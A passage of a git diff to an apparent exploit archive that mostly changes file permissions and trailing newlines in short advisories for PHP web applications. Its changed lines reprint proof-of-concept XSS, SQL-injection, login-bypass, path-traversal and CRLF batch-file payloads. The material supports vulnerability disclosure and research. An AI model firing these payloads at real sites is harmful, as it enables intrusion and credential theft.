http://www.example.com/admin/displayImage.php?img=<name_of_existing_file_in_md5_format>&name=asa.cmd"%0d%0a%0d%0a@echo off%0d%0aecho running batch file%0d%0apause%0d%0aexit -Note: The <name_of_existing_file_in_md5_format> is the name of one file existing on the "upload/" folder. It&#039;s name must be a MD5 hash, without any extension. ex: "435ed7e9f07f740abf511a62c00eef6e" \ No newline at end of file +Note: The <name_of_existing_file_in_md5_format> is the name of one file existing on the "upload/" folder. It&#039;s name must be a MD5 hash, without any extension. ex: "435ed7e9f07f740abf511a62c00eef6e" \ No newline at end of file diff --git a/platforms/php/webapps/36346.txt b/platforms/php/webapps/36346.txt old mode 100755 new mode 100644 index 1ac6f167b..a593013a0 --- a/platforms/php/webapps/36346.txt +++ b/platforms/php/webapps/36346.txt @@ -13,4 +13,4 @@ line 72: echo &#039;<br /><strong>TESTING INFO:</strong> Time page: <strong>&#03 ... line 75: echo "GLOBALS[$main_page] and HTTP_GET_VARS[&#039;main_page&#039;] and _GET[&#039;main_page&#039;] = " . $GLOBALS[&#039;main_page&#039;] . &#039; - &#039; . $HTTP_GET_VARS[&#039;main_page&#039;] . &#039; - &#039; . $_GET[&#039;main_page&#039;] . &#039;<br /><br />&#039;; ... -line 76: echo "_SERVER[&#039;PHP_SELF&#039;] and _GET[&#039;PHP_SELF&#039;] and PHP_SELF and _SESSION[&#039;PHP_SELF&#039;] = " . $_SERVER[&#039;PHP_SELF&#039;] . &#039; - &#039; . $_GET[&#039;PHP_SELF&#039;] . &#039; - &#039; . $PHP_SELF . &#039; - &#039; . $_SESSION[&#039;PHP_SELF&#039;] . &#039;<br /><br />&#039;; \ No newline at end of file +line 76: echo "_SERVER[&#039;PHP_SELF&#039;] and _GET[&#039;PHP_SELF&#039;] and PHP_SELF and _SESSION[&#039;PHP_SELF&#039;] = " . $_SERVER[&#039;PHP_SELF&#039;] . &#039; - &#039; . $_GET[&#039;PHP_SELF&#039;] . &#039; - &#039; . $PHP_SELF . &#039; - &#039; . $_SESSION[&#039;PHP_SELF&#039;] . &#039;<br /><br />&#039;; \ No newline at end of file diff --git a/platforms/php/webapps/36347.txt b/platforms/php/webapps/36347.txt old mode 100755 new mode 100644 index 470a84708..5ba222b60 --- a/platforms/php/webapps/36347.txt +++ b/platforms/php/webapps/36347.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Hastymail2 2.1.1 is vulnerable; other versions may also be affected. GET: http://<app_base>/index.php?page=mailbox&mailbox=Drafts -POST: rs=<script>alert(&#039;xss&#039;)</script> \ No newline at end of file +POST: rs=<script>alert(&#039;xss&#039;)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36348.txt b/platforms/php/webapps/36348.txt old mode 100755 new mode 100644 index d58257ddf..b3d436775 --- a/platforms/php/webapps/36348.txt +++ b/platforms/php/webapps/36348.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Pro Clan Manager 0.4.2 is vulnerable; other versions may also be affected. -notarealuser%00'+union+select+1;# \ No newline at end of file +notarealuser%00'+union+select+1;# \ No newline at end of file diff --git a/platforms/php/webapps/36349.txt b/platforms/php/webapps/36349.txt old mode 100755 new mode 100644 index 4e4c4fdcb..c919ca4fb --- a/platforms/php/webapps/36349.txt +++ b/platforms/php/webapps/36349.txt @@ -9,4 +9,4 @@ AdaptCMS 2.0.0 and 2.0.1 are vulnerable; other versions may also be affected. http://www.example.com/article/'66/Blog/AdaptCMS-20-March-26th http://www.example.com/article/'75/News/AdaptCMS-200-Released http://www.example.com/article/'293/Album/Pink-Floyd-Animals -http://www.example.com/article/'294/News/AdaptCMS-202-Update \ No newline at end of file +http://www.example.com/article/'294/News/AdaptCMS-202-Update \ No newline at end of file diff --git a/platforms/php/webapps/36350.txt b/platforms/php/webapps/36350.txt old mode 100755 new mode 100644 index f50c5e8c6..52b644e08 --- a/platforms/php/webapps/36350.txt +++ b/platforms/php/webapps/36350.txt @@ -4,4 +4,4 @@ CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fail A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/<CMS Balitbang Installation Path>/index.php?id=lih_buku&hal='[SQL] \ No newline at end of file +http://www.example.com/<CMS Balitbang Installation Path>/index.php?id=lih_buku&hal='[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/36351.txt b/platforms/php/webapps/36351.txt old mode 100755 new mode 100644 index 61a099066..83148ccd3 --- a/platforms/php/webapps/36351.txt +++ b/platforms/php/webapps/36351.txt @@ -4,4 +4,4 @@ CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fail A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/<CMS Balitbang Installation Path>/alumni.php?id=data&tahun&hal='[SQL] \ No newline at end of file +http://www.example.com/<CMS Balitbang Installation Path>/alumni.php?id=data&tahun&hal='[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/36358.html b/platforms/php/webapps/36358.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36362.txt b/platforms/php/webapps/36362.txt old mode 100755 new mode 100644 index 1feabdf77..cba600824 --- a/platforms/php/webapps/36362.txt +++ b/platforms/php/webapps/36362.txt @@ -10,4 +10,4 @@ http://www.example.com/demo/admin/controller.php?file=admins&do=edit&id=XSS http://www.example.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS http://www.example.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS http://www.example.com/demo/admin/controller.php?file=suggest-category&id=XSS -http://www.example.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS \ No newline at end of file +http://www.example.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS \ No newline at end of file diff --git a/platforms/php/webapps/36363.txt b/platforms/php/webapps/36363.txt old mode 100755 new mode 100644 index da3fbc927..363af724a --- a/platforms/php/webapps/36363.txt +++ b/platforms/php/webapps/36363.txt @@ -4,4 +4,4 @@ Skysa App Bar Plugin for WordPress is prone to a cross-site-scripting vulnerabil An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/wp-content/plugins/skysa-official/skysa.php?submit=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/skysa-official/skysa.php?submit=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36364.txt b/platforms/php/webapps/36364.txt old mode 100755 new mode 100644 index d21c5f8cc..ec77bfd48 --- a/platforms/php/webapps/36364.txt +++ b/platforms/php/webapps/36364.txt @@ -8,4 +8,4 @@ Manx 1.0.1 is vulnerable; other versions may also be affected. http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit="><script>alert(1)</script> -http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit=5&search=1&search_folder=</script><script>alert(1)</script>Waddup Thricer! \ No newline at end of file +http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit=5&search=1&search_folder=</script><script>alert(1)</script>Waddup Thricer! \ No newline at end of file diff --git a/platforms/php/webapps/36365.txt b/platforms/php/webapps/36365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36366.txt b/platforms/php/webapps/36366.txt old mode 100755 new mode 100644 index 0793c5419..d011f485e --- a/platforms/php/webapps/36366.txt +++ b/platforms/php/webapps/36366.txt @@ -6,4 +6,4 @@ Exploiting these issues will allow an attacker to execute arbitrary script code Manx 1.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/admin/admin_blocks.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini \ No newline at end of file +http://www.example.com/admin/admin_blocks.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini \ No newline at end of file diff --git a/platforms/php/webapps/36367.txt b/platforms/php/webapps/36367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36368.txt b/platforms/php/webapps/36368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36371.txt b/platforms/php/webapps/36371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36372.txt b/platforms/php/webapps/36372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36373.txt b/platforms/php/webapps/36373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36374.txt b/platforms/php/webapps/36374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36379.txt b/platforms/php/webapps/36379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3638.txt b/platforms/php/webapps/3638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36380.txt b/platforms/php/webapps/36380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36381.txt b/platforms/php/webapps/36381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36382.txt b/platforms/php/webapps/36382.txt old mode 100755 new mode 100644 index 85f492b35..ae0787dc4 --- a/platforms/php/webapps/36382.txt +++ b/platforms/php/webapps/36382.txt @@ -8,4 +8,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described. -http://www.example.com/[path]/wp-content/plugins/1-jquery-photo-gallery-slideshow-flash/wp-1pluginjquery.php?page=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/1-jquery-photo-gallery-slideshow-flash/wp-1pluginjquery.php?page=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36383.txt b/platforms/php/webapps/36383.txt old mode 100755 new mode 100644 index 7a1c17c54..39b5a36c5 --- a/platforms/php/webapps/36383.txt +++ b/platforms/php/webapps/36383.txt @@ -4,4 +4,4 @@ flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vul An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/facebook.php?i=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/facebook.php?i=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36384.txt b/platforms/php/webapps/36384.txt old mode 100755 new mode 100644 index 1e5fbd3d1..520c6f43e --- a/platforms/php/webapps/36384.txt +++ b/platforms/php/webapps/36384.txt @@ -8,4 +8,4 @@ SugarCRM Community Edition 6.3.0RC1 is vulnerable; other versions may also be af http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&where=0%29%20union%20select%20version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71%20--%20 -http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE_HERE%20--%20 \ No newline at end of file +http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE_HERE%20--%20 \ No newline at end of file diff --git a/platforms/php/webapps/36385.txt b/platforms/php/webapps/36385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36386.txt b/platforms/php/webapps/36386.txt old mode 100755 new mode 100644 index c6f7b015d..50a58f67b --- a/platforms/php/webapps/36386.txt +++ b/platforms/php/webapps/36386.txt @@ -8,7 +8,4 @@ go to www.target.com/path/admin.php username = admin 'or' 1=1 -password = anything - - - \ No newline at end of file +password = anything \ No newline at end of file diff --git a/platforms/php/webapps/3639.txt b/platforms/php/webapps/3639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3640.txt b/platforms/php/webapps/3640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36401.txt b/platforms/php/webapps/36401.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36406.txt b/platforms/php/webapps/36406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36407.txt b/platforms/php/webapps/36407.txt old mode 100755 new mode 100644 index 64f34b413..c7db4b71d --- a/platforms/php/webapps/36407.txt +++ b/platforms/php/webapps/36407.txt @@ -4,4 +4,4 @@ Elxis CMS is prone to multiple cross-site scripting vulnerabilities because it f An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com//elxis/administrator/index.php/%22onmouseover=prompt(dclabs)%3E \ No newline at end of file +http://www.example.com//elxis/administrator/index.php/%22onmouseover=prompt(dclabs)%3E \ No newline at end of file diff --git a/platforms/php/webapps/36408.txt b/platforms/php/webapps/36408.txt old mode 100755 new mode 100644 index d873928cc..c0dece1e2 --- a/platforms/php/webapps/36408.txt +++ b/platforms/php/webapps/36408.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Pretty Link 1.5.2 is vulnerable; other versions may also be affected. - http://www.example.com/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=[xss] \ No newline at end of file + http://www.example.com/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/3641.txt b/platforms/php/webapps/3641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36410.txt b/platforms/php/webapps/36410.txt old mode 100755 new mode 100644 index cf137ec68..abf2bdd3b --- a/platforms/php/webapps/36410.txt +++ b/platforms/php/webapps/36410.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to upload arbitrary files to the affected co Simple Machines Forum 1.1.15 is vulnerable; other versions may also be affected. -http://www.example.com/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php \ No newline at end of file +http://www.example.com/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php \ No newline at end of file diff --git a/platforms/php/webapps/36413.txt b/platforms/php/webapps/36413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36414.txt b/platforms/php/webapps/36414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36418.txt b/platforms/php/webapps/36418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36432.txt b/platforms/php/webapps/36432.txt old mode 100755 new mode 100644 index 066ac1c24..a60378040 --- a/platforms/php/webapps/36432.txt +++ b/platforms/php/webapps/36432.txt @@ -4,4 +4,4 @@ Pet Listing is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">[XSS] \ No newline at end of file +http://www.example.com/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36434.txt b/platforms/php/webapps/36434.txt old mode 100755 new mode 100644 index 0bf2ec2c8..b6a9f611f --- a/platforms/php/webapps/36434.txt +++ b/platforms/php/webapps/36434.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br GRAND FlAGallery 1.57 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36435.txt b/platforms/php/webapps/36435.txt old mode 100755 new mode 100644 index 2139a0248..b009e8961 --- a/platforms/php/webapps/36435.txt +++ b/platforms/php/webapps/36435.txt @@ -157,4 +157,4 @@ Advisory Release: 03/18/2015 VIII.Credits ======================================================== Discovered by Rehan Ahmed -knight_rehan@hotmail.com \ No newline at end of file +knight_rehan@hotmail.com \ No newline at end of file diff --git a/platforms/php/webapps/36439.txt b/platforms/php/webapps/36439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36444.txt b/platforms/php/webapps/36444.txt old mode 100755 new mode 100644 index a74983125..9cb00388c --- a/platforms/php/webapps/36444.txt +++ b/platforms/php/webapps/36444.txt @@ -4,4 +4,4 @@ flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vul An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36445.txt b/platforms/php/webapps/36445.txt old mode 100755 new mode 100644 index 61f0566d2..4c16d6d55 --- a/platforms/php/webapps/36445.txt +++ b/platforms/php/webapps/36445.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br The Welcomizer 1.3.9.4 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36446.txt b/platforms/php/webapps/36446.txt old mode 100755 new mode 100644 index 48ec84c44..05452a4b5 --- a/platforms/php/webapps/36446.txt +++ b/platforms/php/webapps/36446.txt @@ -18,4 +18,4 @@ http://www.example.com/private/en/users/edit?id=1"><script>alert(&#039;xss&#039; http://www.example.com/private/en/pages/edit?token=true&id=1"><script>alert(&#039;xss&#039;)</script> -http://www.example.com/private/en/mailmotor/settings?token="><script>alert(&#039;xss&#039;)</script> \ No newline at end of file +http://www.example.com/private/en/mailmotor/settings?token="><script>alert(&#039;xss&#039;)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36447.txt b/platforms/php/webapps/36447.txt old mode 100755 new mode 100644 index 7f5a4aaec..65bc13e7b --- a/platforms/php/webapps/36447.txt +++ b/platforms/php/webapps/36447.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Pulse Pro 1.7.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php?p=blocks&d="><script>alert(1)</script> -http://www.example.com/index.php?p=edit-post&post_id="><script>alert(1)</script> \ No newline at end of file +http://www.example.com/index.php?p=edit-post&post_id="><script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36448.txt b/platforms/php/webapps/36448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36449.txt b/platforms/php/webapps/36449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3645.htm b/platforms/php/webapps/3645.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36450.txt b/platforms/php/webapps/36450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36451.txt b/platforms/php/webapps/36451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36453.txt b/platforms/php/webapps/36453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36454.txt b/platforms/php/webapps/36454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36456.txt b/platforms/php/webapps/36456.txt old mode 100755 new mode 100644 index 88c99602b..c4a58e173 --- a/platforms/php/webapps/36456.txt +++ b/platforms/php/webapps/36456.txt @@ -8,4 +8,4 @@ Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable. http://www.example.org/owl/admin/index.php?userid=1 http://www.example.org/owl/admin/index.php?userid=1&newuser -http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1 \ No newline at end of file +http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1 \ No newline at end of file diff --git a/platforms/php/webapps/36460.txt b/platforms/php/webapps/36460.txt old mode 100755 new mode 100644 index 9acf2ec98..d7a7e51d4 --- a/platforms/php/webapps/36460.txt +++ b/platforms/php/webapps/36460.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Flirt-Projekt 4.8 is vulnerable; other versions may also be affected. -http://www.example.com/flirtportal/rub2_w.php?kontaktid=f6389d0eeabdb4aaf99f3c3c949dc793&rub=1â??a \ No newline at end of file +http://www.example.com/flirtportal/rub2_w.php?kontaktid=f6389d0eeabdb4aaf99f3c3c949dc793&rub=1â??a \ No newline at end of file diff --git a/platforms/php/webapps/36461.txt b/platforms/php/webapps/36461.txt old mode 100755 new mode 100644 index e1b098c14..d67122a65 --- a/platforms/php/webapps/36461.txt +++ b/platforms/php/webapps/36461.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Social Network Community 2 is vulnerable; other versions may also be affected. -http://www.example.com/social2/user.php?userId=12'a \ No newline at end of file +http://www.example.com/social2/user.php?userId=12'a \ No newline at end of file diff --git a/platforms/php/webapps/36462.txt b/platforms/php/webapps/36462.txt old mode 100755 new mode 100644 index 5a5cc9510..2914f4ace --- a/platforms/php/webapps/36462.txt +++ b/platforms/php/webapps/36462.txt @@ -4,4 +4,4 @@ Video Community Portal is prone to an SQL-injection vulnerability because it fai Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/videoportalneu/index.php?d=user&id=2â??a \ No newline at end of file +http://www.example.com/videoportalneu/index.php?d=user&id=2â??a \ No newline at end of file diff --git a/platforms/php/webapps/36463.txt b/platforms/php/webapps/36463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36464.txt b/platforms/php/webapps/36464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36466.txt b/platforms/php/webapps/36466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36468.txt b/platforms/php/webapps/36468.txt old mode 100755 new mode 100644 index ab9b7ea54..8d1b83ca0 --- a/platforms/php/webapps/36468.txt +++ b/platforms/php/webapps/36468.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Booking Calendar 10e is vulnerable; other versions may also be affected. -http://www.example.com/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS] \ No newline at end of file +http://www.example.com/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36469.txt b/platforms/php/webapps/36469.txt old mode 100755 new mode 100644 index 847fca19b..26af43ee5 --- a/platforms/php/webapps/36469.txt +++ b/platforms/php/webapps/36469.txt @@ -4,4 +4,4 @@ Joomla! 'com_tsonymf' component is prone to an SQL-injection vulnerability becau Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[PATH]/index.php?option=com_tsonymf&controller=fpage&task=flypage&idofitem=162 (SQL) \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_tsonymf&controller=fpage&task=flypage&idofitem=162 (SQL) \ No newline at end of file diff --git a/platforms/php/webapps/36470.txt b/platforms/php/webapps/36470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36471.txt b/platforms/php/webapps/36471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36472.txt b/platforms/php/webapps/36472.txt old mode 100755 new mode 100644 index 6e5070d5d..32d19fe70 --- a/platforms/php/webapps/36472.txt +++ b/platforms/php/webapps/36472.txt @@ -4,4 +4,4 @@ Joomla! 'com_caproductprices' component is prone to an SQL-injection vulnerabili Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[PATH]/index.php?option=com_caproductprices&Itemid=&task=graph&id=83 (SQL) \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_caproductprices&Itemid=&task=graph&id=83 (SQL) \ No newline at end of file diff --git a/platforms/php/webapps/36473.txt b/platforms/php/webapps/36473.txt old mode 100755 new mode 100644 index 16acf0b97..4410dc6de --- a/platforms/php/webapps/36473.txt +++ b/platforms/php/webapps/36473.txt @@ -4,4 +4,4 @@ Cyberoam UTM is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/corporate/Controller?mode=301&tableid=[SQL]&sort=&dir= \ No newline at end of file +http://www.example.com/corporate/Controller?mode=301&tableid=[SQL]&sort=&dir= \ No newline at end of file diff --git a/platforms/php/webapps/36474.txt b/platforms/php/webapps/36474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36478.php b/platforms/php/webapps/36478.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36481.txt b/platforms/php/webapps/36481.txt old mode 100755 new mode 100644 index 123807b6e..145bfaa33 --- a/platforms/php/webapps/36481.txt +++ b/platforms/php/webapps/36481.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TheCartPress WordPress Plugin 1.6 and prior versions are vulnerable. -http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234 \ No newline at end of file +http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234 \ No newline at end of file diff --git a/platforms/php/webapps/36482.txt b/platforms/php/webapps/36482.txt old mode 100755 new mode 100644 index b950f4f4a..1f53277be --- a/platforms/php/webapps/36482.txt +++ b/platforms/php/webapps/36482.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Siena CMS 1.242 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?err=[XSS] \ No newline at end of file +http://www.example.com/index.php?err=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36483.txt b/platforms/php/webapps/36483.txt old mode 100755 new mode 100644 index 0f371128b..b39fe3c03 --- a/platforms/php/webapps/36483.txt +++ b/platforms/php/webapps/36483.txt @@ -4,4 +4,4 @@ WP Live.php plugin for WordPress is prone to a cross-site-scripting vulnerabilit An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/36484.txt b/platforms/php/webapps/36484.txt old mode 100755 new mode 100644 index 3fe15e601..d887ba862 --- a/platforms/php/webapps/36484.txt +++ b/platforms/php/webapps/36484.txt @@ -4,4 +4,4 @@ PHPB2B is prone to a cross-site-scripting vulnerability because it fails to prop An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[patch]/list.php?do=search&q=[XSS] \ No newline at end of file +http://www.example.com/[patch]/list.php?do=search&q=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36485.txt b/platforms/php/webapps/36485.txt old mode 100755 new mode 100644 index 44fa44dcc..e1aa7be6d --- a/platforms/php/webapps/36485.txt +++ b/platforms/php/webapps/36485.txt @@ -6,4 +6,4 @@ An attacker could leverage this issue to execute arbitrary script code in the br FuseTalk Forums 3.2 is vulnerable; other versions may also be affected. -http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file +http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/php/webapps/36486.txt b/platforms/php/webapps/36486.txt old mode 100755 new mode 100644 index 2ea17ec4e..c0e17086f --- a/platforms/php/webapps/36486.txt +++ b/platforms/php/webapps/36486.txt @@ -8,4 +8,4 @@ The following example URIs are available: http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13-- -http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- \ No newline at end of file +http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- \ No newline at end of file diff --git a/platforms/php/webapps/36487.txt b/platforms/php/webapps/36487.txt old mode 100755 new mode 100644 index 479b45307..f4008ddaa --- a/platforms/php/webapps/36487.txt +++ b/platforms/php/webapps/36487.txt @@ -4,4 +4,4 @@ The Comment Rating plugin for WordPress is prone to a cross-site scripting vulne An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer 